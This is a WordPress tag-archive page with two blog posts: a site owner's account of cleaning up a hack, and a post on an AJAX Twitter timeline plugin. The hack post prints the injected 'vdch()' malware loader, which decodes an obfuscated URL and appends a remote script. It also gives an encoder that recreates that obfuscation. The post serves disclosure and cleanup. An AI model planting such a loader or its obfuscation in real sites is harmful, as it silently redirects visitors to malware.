Tag Archives: WordPress

What the Hack?

I got an email today asking me for support. One of my WordPress setups had been reported to be hacked – resulting in a JavaScript redirect to a site distributing malware.

Searching for the hack itself or the redirect I couldn’t find anything useful (except for an entry in the Google support forum).

Every JavaScript file in wp-content/plugins and wp-content/themes was infected with a function added to the bottom of the script: “function vdch()”. Make sure your blogs are clean.

Update: As I just read in this forum, on Stack Overflow and on WordPress, they seem to compromise PHP and HTML files too. I guess in my case they couldn’t by exploiting the WordPress vulnerability because its built-in editor only allows you to edit plugins and themes.

This is the script they’ve been using on the setup I had to clean up. It fails in Firefox but seems to run fine in Chrome.

function vdch() {
    // wait until document.all holds at least four nodes
    if(document.all.length > 3) {
        // array of "#RRGGBB" strings, three URL characters per entry (elided here)
        var t = new Array(...);
        var dchid = "";
        for (j=0;j<t.length;j++) {
            var c_rgb = t[j];
            // read the hex pairs at offsets 1, 3 and 5; i is bumped inside the
            // body as well, so the XOR keys are 2, 4 and 6 and "00" is padding
            for (i=1;i<7;i++) {
                var c_clr = c_rgb.substr(i++,2);
                if (c_clr!="00") dchid += String.fromCharCode(
                        parseInt(c_clr,16)^i);
            }
        }
        // append a <script> whose src is the decoded URL to the fourth node
        var dch = document.createElement("script");
        dch.id = "dchid";
        dch.src = dchid;
        document.all[3].appendChild(dch);
    } else {
        setTimeout("vdch()",500);   // document not ready yet, retry in 500 ms
    }
} setTimeout("vdch()",500);

Update 2: I was curious about how the string (=URL) encryption works in the script above. Here’s the function I came up with. Pretty nice idea (never had a look at JavaScript obfuscation before).

var url = "http://your.url/";
var enc = [];
var rgb = "#";
var i, j;

// three characters per "#RRGGBB" entry, XORed with 2, 4 and 6 in turn
// (the keys vdch() uses when it reads the hex pairs back); pad to two
// hex digits so the decoder's fixed offsets stay aligned
for (i = 0, j = 2; i < url.length; i++, j += 2) {
    rgb += ("0" + (url.charCodeAt(i) ^ j).toString(16)).slice(-2);
    if (j == 6) {
        j = 0;
        enc.push(rgb);
        rgb = "#";
    }
}

// a trailing partial entry is padded with "00", which the decoder skips
if (rgb != "#") {
    while (rgb.length < 7) rgb += "00";
    enc.push(rgb);
}

AJAXed Twitter Plugin for WordPress

Ricardo González wrote a nice plugin for WordPress that displays the public timeline of a twitter account in your WordPress theme.

Though the plugin works, I found two major problems:

  • Sometimes Twitter doesn’t provide the timeline at first request.
  • Embedding it in your theme significantly slows down loading of the blog.

I came up with a solution to both of them (featuring MooTools or jQuery support) using XMLHttpRequest.

Basically all it does is wait until the page is loaded and then request the tweets. If Twitter decides not to provide the timeline, the request is sent again until a configurable number of retries is reached.
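The load-then-request-with-retry behaviour described above, as an added example that is not the plugin's own code: the core loop takes an injected transport so it runs under Node without a network, and the endpoint path, delay and retry count are placeholders, not values from the plugin.

```javascript
// Added example, not the plugin's own code: request the timeline only after
// the page has loaded, and retry a capped number of times when Twitter
// answers without one. Endpoint, delay and retry count are placeholders.

// Core loop. `fetchOnce()` resolves to an array of tweets, or to null when the
// request came back empty or broken. `wait` is injectable so tests skip delays.
async function loadTimeline(fetchOnce, options = {}) {
  const {
    maxRetries = 3,
    delayMs = 2000,
    wait = ms => new Promise(resolve => setTimeout(resolve, ms)),
  } = options;
  let attempts = 0;
  for (;;) {
    attempts += 1;
    const tweets = await fetchOnce();
    if (Array.isArray(tweets) && tweets.length > 0) return { tweets, attempts };
    if (attempts > maxRetries) return { tweets: [], attempts };   // give up
    await wait(delayMs);
  }
}

// Browser transport: one XMLHttpRequest for the timeline, resolving to null on
// any HTTP error or unparsable body so the retry loop decides what to do.
function xhrFetchOnce(url) {
  return new Promise(resolve => {
    const xhr = new XMLHttpRequest();
    xhr.open("GET", url, true);
    xhr.onload = () => {
      if (xhr.status !== 200) return resolve(null);
      try { resolve(JSON.parse(xhr.responseText)); } catch (e) { resolve(null); }
    };
    xhr.onerror = () => resolve(null);
    xhr.send();
  });
}

// Tweet text is third-party content: build nodes with textContent rather than
// injecting markup, so nothing in a tweet is parsed as HTML on the blog.
function renderTweets(container, tweets) {
  const doc = container.ownerDocument;
  const list = doc.createElement("ul");
  for (const tweet of tweets) {
    const item = doc.createElement("li");
    item.textContent = tweet.text;
    list.appendChild(item);
  }
  container.appendChild(list);
  return list.childNodes.length;
}

// Only start after the page has finished loading, so the blog does not wait
// on Twitter. "/placeholder-timeline.json" stands in for the plugin's endpoint.
if (typeof window !== "undefined") {
  window.addEventListener("load", () => {
    loadTimeline(() => xhrFetchOnce("/placeholder-timeline.json"), { maxRetries: 5 })
      .then(({ tweets }) => renderTweets(document.getElementById("tweets"), tweets));
  });
}
```

The retry count bounds how long a misbehaving Twitter can keep the widget polling, and because the whole thing starts on the load event the rest of the blog renders before a single request goes out.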

There are two ways to use this plugin:

  1. Configure it manually (see how-to below)
  2. Use it as a widget (version two and above)

If you use it as a widget, simply use the widget management functionality provided by WordPress. Otherwise (if your theme doesn’t support widgets, for example) you can also set it up manually as I did on this blog (because I use MooTools here).